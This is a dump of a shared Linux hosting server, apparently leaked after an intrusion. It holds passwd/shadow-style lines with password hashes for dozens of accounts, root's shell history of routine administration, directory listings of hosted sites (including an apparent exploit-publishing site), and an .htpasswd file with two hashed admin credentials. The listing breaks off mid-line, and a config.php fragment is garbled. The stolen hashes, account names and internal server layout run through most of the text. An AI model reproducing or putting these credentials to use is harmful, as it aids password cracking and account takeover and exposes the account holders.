+snt-nmu:1NZO0tdC.reQ07bby/FttmOEZLF7ys1:1015:1015:,,,:/home/snt-nmu:/bin/bash +nmusic:1tXoV.I8o28zdaeu.Ukrde4hYikNtG0:1020:1020:,,,:/home/nmusic:/bin/bash +mydns:1C8cYgZB0p9rtxWwyXoiJiK4QUa.sJ/:1021:1021:,,,:/home/mydns:/bin/bash +conference-sidelnikov:1ghcMsPcI9j5ok3AbEf5qGI.h7Mq7O.:1016:1016:,,,:/home/conference-sidelnikov:/bin/bash +lena:153QNshcJB/5PK1r8L/60LAOJCwzik1:1000:1000:,,,:/home/lena:/bin/bash +vakulenko:1g6y9T9/TWWr1s.FTZKwuKj2qwbYxg1:1027:1027:,,,:/home/vakulenko:/bin/bash +xanavi:1V4L5wKgWog9Kl4lV0uwvG0/0TyHyq1:1001:1001:,,,:/home/xanavi:/bin/bash +lalizas:1dzDm0j2v0fE06VyK89b/Pfm6ePylC0:1003:1003:,,,:/home/lalizas:/bin/bash +r0otech0inj3ct0rr00t0ro0t3r:1Yu.4UMOxpFH639CL8260qyjYwKgbk1:1006:1034:,,,:/home/r0otech0inj3ct0rr00t0ro0t3r:/bin/bash +n3tw0rkTeRr0r15M:1u1DDFCJnGFd0M07E5kahW3t0N1yYD1:1010:1034:,,,:/home/n3tw0rkTeRr0r15M:/bin/bash +pma:1cDULb4Zqt4ksmqqFe9MIQSBLrz3lO.:1019:1019:,,,:/home/pma:/bin/bash +valiant:1QXeOzsOyaW8gT6JknX1Ssa.A3ef8g/:1024:1024:,,,:/home/valiant:/bin/bash +cherrybikes:11MJaagK8rJ6BQ9pxLdZjU.WhIGG4r0:1031:1031:,,,:/home/cherrybikes:/bin/bash +natasha:1NmwIlomO.Y00wBbg0eGE9dqOP4qis/:1032:1032:,,,:/home/natasha:/bin/bash +ntp:!:107:107::/home/ntp:/bin/false +chupik:1gpJL5HGbm7EeCor46OOs8L0y1L7mH1:1005:1033:,,,:/home/chupik:/bin/bash +sweethome:1x4j1/bzV8Vf5fHBfeSp3BgMUNojJf.:1004:1035:,,,:/home/sweethome:/bin/bash +sweethome-lena:1uZFdDmVbAHGDtbBEGs1jjYYtvVONN1:1009:1036:,,,:/home/sweethome-lena:/bin/bash +skyweb:1.wiXZLSKG4F6WGVdgKDIorjx77.ZD1:1028:1037:,,,:/home/skyweb:/bin/bash +yslivka:1RNlOuljj5wZ8hdD0kSDe2wPMREdBu1:1029:1038:,,,:/home/yslivka:/bin/bash +tmv-nmu:168k122DrZFKqjXrwYSjjdMSKzzVDy.:1030:1039:,,,:/home/tmv-nmu:/bin/bash +web-ghost:1wuuXL1mSrDxVErzeO0KuoZKu8mJBj1:1018:1018:,,,:/home/web-ghost:/bin/bash +tiler-andrey:1RGxMA/cQA090Sx/VTTctkkHFZEs7I1:1035:1041:,,,:/home/tiler-andrey:/bin/bash +sunsanych:1RaR9SD58m80b/DVZEHYg6Ik4SKYWJ.:1036:1042:,,,:/home/sunsanych:/bin/bash +ra5ta:1nkELVbaHtGqTJl29kSFbjlDs1Yy3U0:1037:1043:,,,:/home/ra5ta:/bin/bash +magicgarden:1.MBu1KaRXkR2bihB8ZXnqfHbqQ5bm0:1038:1044:,,,:/home/magicgarden:/bin/bash +hochumogu:1MwCkIsEmO0Xe/BV8PndFgE9sIMF/Q1:1025:1025:,,,:/home/hochumogu:/bin/bash +libuuid:!:108:110::/var/lib/libuuid:/bin/sh +steelnews:1ajGgNpodz1jrN1JlmcmLmms5Wf7kn0:1017:1017:,,,:/home/steelnews:/bin/bash +vonline:1sk1MRD8BW3jlEKEYUNCtJ3d0gY1bh0:1022:1045:,,,:/home/vonline:/bin/bash +dyquem:1JkATmEyg3XnBHIeGOEstzP2vmes4s1:1039:1046:,,,:/home/dyquem:/bin/bash +vika:1bkhqsMEjgj7H.DzRJLoGj64SksjzM1:1040:1047:,,,:/home/vika:/bin/bash +tiler-dima:1jKtO0mArwxlajKK9/v4yFHF1mu9/g0:1026:1040:,,,:/home/tiler-dima:/bin/bash +mazafaka:1LSjx2PhiI7OlLVcMSEz2GJDUiwBmg.:1034:1034:,,,:/home/mazafaka:/bin/bash +tiler:1Qa4oVdJmYjcu6Ccq/7AqTEA6V2GIT1:1023:1023:,,,:/home/tiler:/bin/bash + +$ cd /root + +$ ls -la +total 14 +drwxr-x--- 7 root root 1024 Oct 15 17:27 . +drwxr-xr-x 22 root root 1024 Oct 3 22:04 .. +drwx------ 2 root root 1024 Aug 20 02:09 .aptitude +-rw------- 1 root root 6748 Oct 22 22:28 .bash_history +drwxr-xr-x 2 root root 1024 Aug 20 02:09 .debtags +drwxr-xr-x 2 root root 1024 Oct 15 17:29 .mc +drwxr-xr-x 2 root root 1024 Aug 2 21:39 scripts +drwxr-xr-x 2 root root 1024 Oct 15 16:51 test + +$ cat .bash_history +apache2 -k restart +cd /home/maza*/h* +ls -al +nano index.html +ls -al +nano index.html +exit +a2ensite mazafaka.in +apache2 -k restart +edquota -g inj3ct0r +quotatool +quotatool -g inj3ct0r -bl 512M /home +edquota inj3ct0r +edquota -g inj3ct0r +exit +cd /home/n* +ls -al +cd ht* +ls -al +nano index.php +ls -al +cd t*dark +ls -al +cd gra* +ls -al +cd .. +du +cd .. +ls -al +du tech_dark +du tech_blue +du tech_white +ls -al +cd cpstyles +ls -al +du +du -h +cd . +cd.. + cd .. +du -h *dark +cd tech_dark +ls -al +cd misc +ls -al +cd .. +cd .. +find ./ -name *.tpl +find ./ -name *.htm +find ./ -name *.htm* +find ./ -name *.tpl +cd .. +cd ht* +cd gree* +ls -al +du -h +cd pools +cd pools +cd polls +ls -al +cd .. +cd regimage +ls -la +cd ../.. +nano index.php +ls -al +rm ya*.txt +rm google* +cd incl* +ls -al +cd .. +ls -al +cd green* +ls -al +cd editor +ls -al +cd .. +cd attach +ls -al +cd .. +cd .. +ls -al +find ./ -name *.css +cd cp* +ls -al +cd vB* +ls -al +cd .. +ls -al +du -h +cd .. +find ./ -name *.css +nano ./tech_white/tech_white.css +exit +cd /etc/ +nano crontab +exit +cd /var/ +ls -la +cd mail +ls -al +cd /etc/postfix +nano virtual +postmap virtual +nano aliases +defrag +ls -al +exit +cd /var/mail +ls -al +rm tiler-* +ls -la +exit +exit +passwd tiler +passwd tiler +exit +cd /etc/ +nano passwd +exit +passwd lena +exit +sasldbpasswd2 +saslpasswd2 +saslpasswd2 -c lena +sasllistusers2 +sasldblistusers2 +saslpasswd2 +saslpasswd2 -d sweethome-lena +exit +saslpasswd2 -c sweethome-lena +passwd sweethome-lena +exit +passwd tiler +exit +cd /home/snt* +ls -al +cd ht* +ls -al +nano index.php +exit +cd /home/sn*/h*/ +nano index.php +cd /home/wa*/h* +ls -al +nano index.php +cd /home/wateam +cd h* +nano index.html +exit +cd /home +ls -al +cd lena +ls -al +cd htdocs +ls -al +cd .. +cd .. +rm lena -R +cd mydns +ls -al +cd .. +rmdir mydns +cd temp +ls -al +du -h +rm * +cd .. +ls -al +cd lo* +ls -al +cd .. +rmdir lost+found +exit +cd /home/wateam +ls -al +cd other +ls -al +cd ../htdocs +nano index.html +exit +cd /home/n* +cd htdocs +ls -al +cd inc* +ls -al +nano config.php +exit +cd /etc/apache2 +nano apache2.conf +nano vhosts.conf + +nano apache2.conf +apache2 -k restart +nano apache2.conf +apache2 -k restart +cd /mo*e +cd mo*e +nano fcgi* +cd .. +nano vhosts +nano vhosts +cd /var/lib/log* +ls -al +cat status +cat status|more +nano status +rm status +logrotate +logrotate -f /etc/logrotate.conf +ls -al +nano status +ls -al +df -h +cd /var/log +ls -al +exit +cd /home/ +tar --help +tar +cls +tar --help|more +tar --help|more +tar --help|more +cd cd tiler +ls -al +cd tiler +ls -al +tar cvzf tiler.tar +ls -al +cd ht* +ls -al +tar cvzf tiler.tar +tar --help|more +man tar +ls -akl +ls -al +cd .. +tar -zcvf tiler.tar htdocs +ls -la +nano /etc/passwd +init 6 +exit +ren +rename +mkdir test +cd test +touch 1d_5.jpg +touch 1d_7.JPG +touch 1.jpg +touch 1d7.JPg +ls -al +rename +rename --help +man rename +rename -n (.*)\.JPG 1.jpg +rename -n '/.*\.JPG/' *.jpg +rename -n /.*\.JPG/ *.jpg +rename -n /.*\.JPG/ * +rename -nv /.*\.JPG/ * +ls -al +rename -nv s/.*\.JPG/ * +rename -nv /.*\.JPG/ * +rename -nv /.*\.JPG/ *.JPG +rename -nv /.*\.JPG/ *.JPG +rename -nv '/.*\.JPG/' *.JPG +rename -nv '/.+\.JPG/' *.JPG +rename -nv '/.+\.JPG/' *.JPG +rename -nv . * +rename -nv /./ * +rename -nv /./ *.JPG +rename -n 'y/A-Z/a-z/' * +rename -n '/A-Z/a-z/' * +rename -n /\.JPG/ * +rename -n /\.JPG/ *.JPG +rename -n '\.JPG' *.JPG +rename -n 's/\.JPG/' *.JPG +rename -n 's/\.JPG//' *.JPG +rename -n 's/\.JPG//' *.JPG +rename -n '/\.JPG//' *.JPG +rename -n '/\.JPG//' *.JPG +rename -n '/\.JPG/' *.JPG +rename -n 's/\.JPG//' *.JPG +ls -al +mv 1.jpg ONE.JPG +ls -la +rename -n 's/\.JPG//' *.JPG +rename -n 's/\.JPG//' ** +rename -n 's/\.JPG//' *.* +rename -n 's/\.JPG//' +rename -n 's/\.JPG//' *.JPG +rename -n 's/\.JPG//' *E.JPG +rename -n 's/\.JPG//' *. +man rename +rename -nv s\.jpg// *.JPG +rename -nv s\./jpg// *.JPG +rename -nv s\./jpg// *.JPG +man rename +rename -nv .JPG .jpg * +rename -nv /.JPG .jpg/ * +rename -nv /\.JPG \.jpg/ * +rename -nv /\.JPG \.jpg/ *rename .bak .txt *.bak +rename .bak .txt *.bak +rename -nv s/\.JPG/\.jpg/ * +rename -nv s/\.JPG/\.jpg/ * +rename -nv s/\.JPG/\.jpg/ * +rename -nv s/\.JPG/\./ * +rename -nv s/\.JPG/\.jpg/ * +cd /home/ +cd tiler +cd ht* +cd up* +cd ima* +ls -al +rename s/\.JPG/\.jpg/ * +ls -al +ls -al +rename s/\.JPG/\.jpg/ * +rename -nv s/\.JPG/\.jpg/ * +rename -nv s/\.JPG/\.jpg/ *|more +rename -nv s/\.JPG/\.jpg/ *|more +mc +cd .. +cd .. +cd .. +ls -al +tar zcvf tiler.tar.gz htdocs +cd ht* +rmdir uploaded -R +rm uploaded -R +exit +cd /home/r0*' +cd /home/r0* +cd h* +nano index.php +cd ../../snt* +cd ht* +nano index.php +cd ../../n* +cd ht* +ls -al +nano index.php +ls -al +find / - name *.tpl +find ./ -name *.tpl +find ./ -name template +find ./ -name tp +find ./ -name tem +find ./ -name them +ls -al +grep --help +grep -rl "sweethome" ./ +grep -rl "tiler" ./ +cd ../../ +ls -al +cd sweethome +ls -al +cd htdocs +ls -al +nano tem* +cd tem* +cd blocks +ls -al +nano left.php +nano left.php +cd /home/tiler/ht* +ls -al +cd .././ +cd ../ +ls -al +cd sn* +cd ht* +nano index.php +cd ../../ +cd r0*/h* +nano index.php +cd ../../wa* +cd ../wateam +cd ht* +nani index.html +nani index.htm +nani index.php +ls -al +nano index.html +exit +/etc/init.d/ssh_brute stop +/etc/init.d/ssh_brute start +cd /var/log/pro* +ls -al +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log|grep 18 +tail -n 100 proftpd.log|grep 18 +tail -n 100 proftpd.log|grep 18 +tail -n 100 proftpd.log|grep 18 +exit +cd /home/tiler +ls -al +tar zcvf 18.10.2010.tar.gz htdocs +ls -al +exit +cd /var/log +cd mail +ls -al +cat mail.log|grep stempher +cat mail.log|grep "Oct 19 12" +cat mail.log|grep "Oct 19 12"|more +exit +adduser sbs +adduser sbs +deluser sbs +adduser sbs +cd /home/sbs +cd /etc/apache2 +ls -al +cd si*e +ls -al +cp yslivka.org.ua sbs-ua.com +nano sbs-ua.com +a2ensite sbs-ua.com +cd /etc +exit +apache2 -k restart +exit +cd /etc/apache2 +cd si*e +ls -al +nano asmerok.org.ua +apache2 -k restart +adduser www-data sbs +adduser www-data sbs +apache2 -k restart +exit +cd /etc/ssh* +ls -al +cd sshd* +nano sshd* +exit +/etc/init.d/ssh restart +exit +cd /etc/apache2 +cd si*e +nano sbs-ua.com +apache2 -k restart +exit +unrar +urar +apt-get install unrar +apt-get clean +apt-get update +apt-get install unrar +apt-get install urar +apt-get install unrar-free +unrar +unrar --help +unrar --usage +apt-get upgrade +apt-get clean +exit +deluser sbs +cd /home +rm sbs -R +a2dissite sbs-ua.com +cd /etc/apache2 +cd si*e +rm sbs-ua.com +apache2 -k restart +ls -al +exit +cd /home +ls -la +exit +cd /etc/apache2 +cd si*e +cp chupik.org.ua vdnh.org.ua +cp chupik.org.ua vdnh.org.ua +ls -al +cd .. +nano vhosts +cd si*e +ls -al +nano chupik.org.ua +nano vdnh.org.ua +a2ensite chupik.org.ua +a2ensite vdnh.org.ua +apache2 -k restart +exit + +cd scripts +ls -la +total 4 +drwxr-xr-x 2 root root 1024 Aug 2 21:39 . +drwxr-x--- 7 root root 1024 Oct 15 17:27 .. +-rwx------ 1 root root 76 Feb 1 2010 clear_cband.sh +-rwx------ 1 root root 220 May 31 00:59 uaix_block.sh +cat * +#!/bin/sh + +apache2 -k stop +sleep 5 +rm /etc/apache2/cband/* +apache2 -k start +#!/bin/sh + +rm prefixes.txt +rm /etc/apache2/cband-ua.conf +wget -q http://www.colocall.net/uaix/prefixes.txt + +for i in `cat prefixes.txt` +do + echo "CBandClassDst i" >> /etc/apache2/cband-ua.conf +done + +apache2ctl graceful + +$ cd .. + +$ cd test + +$ ls -la +total 2 +drwxr-xr-x 2 root root 1024 Oct 15 16:51 . +drwxr-x--- 7 root root 1024 Oct 15 17:27 .. +-rw-r--r-- 1 root root 0 Oct 15 16:34 1d7.JPg +-rw-r--r-- 1 root root 0 Oct 15 16:33 1d_5.jpg +-rw-r--r-- 1 root root 0 Oct 15 16:33 1d_7.JPG +-rw-r--r-- 1 root root 0 Oct 15 16:33 ONE.JPG + +$ cd /home + +$ ls -la +total 169 +drwxr-x--x 37 root root 4096 Oct 20 17:45 . +drwxr-xr-x 22 root root 1024 Oct 3 22:04 .. +-rw------- 1 root root 9216 Oct 22 17:45 aquota.group +-rw------- 1 root root 9216 Oct 22 17:45 aquota.user +drwxr-x--- 7 asmer asmer 4096 Oct 22 18:58 asmer +drwxr-x--- 6 cherrybikes cherrybikes 4096 Oct 24 18:56 cherrybikes +drwxr-x--- 4 chupik chupik 4096 Dec 14 2009 chupik +drwxr-x--- 4 conference-sidelnikov conference-sidelnikov 4096 Jan 7 2010 conference-sidelnikov +drwxr-x--- 4 dyquem dyquem 4096 Sep 6 17:20 dyquem +drwxr-x--- 4 hochumogu hochumogu 4096 Jul 16 16:51 hochumogu +drwxr-x--- 13 jaguar jaguar 4096 Oct 24 10:49 jaguar +drwxr-x--- 4 krivopustov krivopustov 4096 Nov 6 2007 krivopustov +drwxr-x--- 3 lalizas lalizas 4096 Feb 18 2009 lalizas +drwxr-x--- 4 magicgarden magicgarden 4096 Jul 12 23:32 magicgarden +drwxr-x--- 4 mazafaka inj3ct0r 4096 Oct 3 20:33 mazafaka +drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 n3tw0rkTeRr0r15M +drwxr-x--- 4 natasha natasha 4096 Oct 19 2009 natasha +drwxr-x--- 4 nmusic nmusic 4096 Mar 2 2009 nmusic +drwxr-x--- 4 pma pma 4096 May 13 16:28 pma +drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 r0otech0inj3ct0rr00t0ro0t3r +drwxr-x--- 4 ra5ta ra5ta 4096 Jul 12 18:25 ra5ta +drwxr-x--- 4 silentwarrior silentwarrior 4096 Oct 4 2009 silentwarrior +drwxr-x--- 4 skyweb skyweb 4096 Apr 16 2010 skyweb +drwxr-x--- 4 snt-nmu snt-nmu 4096 Feb 27 2009 snt-nmu +drwxr-x--- 4 steelnews steelnews 4096 Sep 4 15:20 steelnews +drwxr-x--- 4 sunsanych sunsanych 4096 Jun 13 14:07 sunsanych +drwxr-x--- 4 sweethome sweethome 4096 Aug 16 01:21 sweethome +drwxrwxrwx 2 root root 4096 Oct 24 16:12 temp +drwxr-x--- 4 tiler tiler 4096 Oct 20 22:37 tiler +drwxr-x--- 4 tmv-nmu tmv-nmu 4096 May 6 08:49 tmv-nmu +drwxr-x--- 4 vakulenko vakulenko 4096 Feb 27 2009 vakulenko +drwxr-x--- 4 vika vika 4096 Sep 8 19:15 vika +drwxr-x--- 4 volosovets volosovets 4096 Nov 6 2007 volosovets +drwxr-x--- 4 vonline vonline 4096 Sep 5 22:13 vonline +drwxr-x--- 5 wapper wapper 4096 Jun 13 2009 wapper +drwxr-x--- 4 wateam wateam 4096 Dec 27 2009 wateam +drwxr-x--- 4 web-ghost web-ghost 4096 Jun 7 10:05 web-ghost +drwxr-x--- 4 xanavi xanavi 4096 Jun 9 2009 xanavi +drwxr-x--- 4 yslivka yslivka 4096 Apr 23 2010 yslivka + +$ cd r0otech0inj3ct0rr00t0ro0t3r + +$ ls -la +total 8048 +drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 . +drwxr-x--x 37 root root 4096 Oct 20 17:45 .. +drwxr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Jan 22 2010 cgi-bin +-rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 8210510 Oct 24 19:29 error.log +dr-xr-xr-x 9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 24 19:27 htdocs + +$ cd htdocs + +$ ls -la +total 184 +dr-xr-xr-x 9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 5 19:21 . +drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 .. +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1821 Oct 5 19:19 .htaccess +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 85 Oct 1 14:17 BingSiteAuth.xml +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4047 Oct 1 14:17 author.php +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 banner +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 19 13:20 banner_black +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1445 Oct 1 14:17 browser.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2308 Oct 1 14:17 category.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 604 Oct 1 14:17 config.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1598 Oct 1 14:17 date.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 562 Oct 1 14:17 db.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2090 Oct 1 14:17 exploit.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1406 Oct 1 14:17 favicon.ico +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 28 14:15 files +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 53 Oct 1 14:17 googlee6e0c515ab2abd97.html +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 83 Oct 1 14:17 hacker.php +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 19 02:37 images +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1745 Oct 16 12:34 index.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2672 Oct 8 13:19 inj3ct0r.css +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 9293 Oct 5 19:15 lib.php +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 pages +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1008 Oct 1 14:17 pages.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2873 Oct 1 14:17 platform.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1894 Oct 1 14:17 related.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 131 Oct 1 14:17 robots.txt +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1598 Oct 1 14:17 rss.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2203 Oct 5 19:10 search.php +-rwxr--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1739 Oct 1 14:17 sitemap.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 48792 Oct 24 18:58 sitemap.xml.gz +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 27 23:53 sploits +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 templates +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 261 Oct 1 14:17 y_key_6e34fe98df61c405.html +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 0 Oct 1 14:17 yandex_76b91b15d528ba00.txt + +$ cat config.php + shellcodeCategories, +25 +); + +redCategory = 34; + +?> + +$ cd .. +$ cd n3tw0rkTeRr0r15M + +$ ls -la +total 20 +drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 . +drwxr-x--x 37 root root 4096 Oct 20 17:45 .. +-rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 96 Aug 12 12:15 .htpasswd +drwxr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jan 22 2010 cgi-bin +drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r 4096 Oct 4 00:16 htdocs + +$ cat .htpasswd +inj3ct0r:1dAX/67F424a4D3Z.QWXTfZi0e2/0G/ +inj3ct0r_operator:1cjVbCTaHGGgdG7e.ceNBXZ7ucjsOt1 + +$ cd htdocs + +$ ls -la +total 2240 +drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r 4096 Oct 4 00:16 . +drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 .. +-rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 178 Aug 24 01:59 .htaccess +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 24170 Jun 29 15:27 ajax.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 75837 Jun 29 15:27 album.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17463 Jun 29 15:27 announcement.php +dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 archive +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 18637 Jun 29 15:28 attachment.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 75654 Jun 29 15:28 calendar.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 43 Jun 6 14:02 clear.gif +dr-xr-xr-x 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 27 19:45 clientscript +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 15264 Jun 29 15:28 converse.php +dr-xr-xr-x 7 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 cpstyles +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 3645 Jun 29 15:28 cron.php +dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 customavatars +dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 customgroupicons +dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 customprofilepics +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 48083 Jun 29 15:28 editpost.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 29811 Jun 29 15:29 external.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10114 Jun 29 15:29 faq.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 36347 Jun 29 15:41 forumdisplay.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 40159 Jun 29 15:29 global.php +dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 greenfox +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 138517 Jun 29 15:30 group.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 25247 Jun 29 15:29 group_inlinemod.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10850 Jun 29 15:30 groupsubscription.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9375 Jun 29 15:30 image.php +dr-xr-xr-x 5 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 27 19:42 images +dr-xr-xr-x 6 n3tw0rkTeRr0r15M inj3ct0r 12288 Jun 6 14:01 includes +-rwxrwxrwx 1 n3tw0rkTeRr0r15M inj3ct0r 19444 Sep 26 12:27 index.php +dr-xr-xr-x 6 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 16:28 infernoshout +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 11103 Jun 29 15:30 infernoshout.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 44256 Jun 29 15:30 infraction.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 183249 Jun 29 15:31 inlinemod.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10670 Jun 29 15:31 joinrequests.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 11052 Jun 29 15:31 login.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17392 Jun 29 15:31 member.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 16259 Jun 29 15:31 member_inlinemod.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 36229 Jun 29 15:31 memberlist.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 24194 Jun 29 15:31 misc.php +dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 modcp +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 63652 Jun 29 15:32 moderation.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 7084 Jun 29 15:32 moderator.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 1889 Jun 29 15:32 myip.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 18804 Jun 29 15:32 newattachment.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 37429 Jun 29 15:33 newreply.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19239 Jun 29 15:33 newthread.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19932 Jun 29 15:33 online.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 8024 Jun 29 15:33 payment_gateway.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12238 Jun 29 15:33 payments.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 8217 Jun 29 15:34 picture.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 22368 Jun 29 15:33 picture_inlinemod.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 25635 Jun 29 15:34 picturecomment.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 27740 Jun 29 15:34 poll.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9840 Jun 29 15:34 posthistory.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 74696 Jun 29 15:34 postings.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 6921 Jun 29 15:34 printthread.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 71068 Jun 29 15:34 private.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 152656 Jun 29 15:35 profile.php +dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 22:02 r00tpan3l123lol +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 40079 Jun 29 15:35 register.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 6015 Jun 29 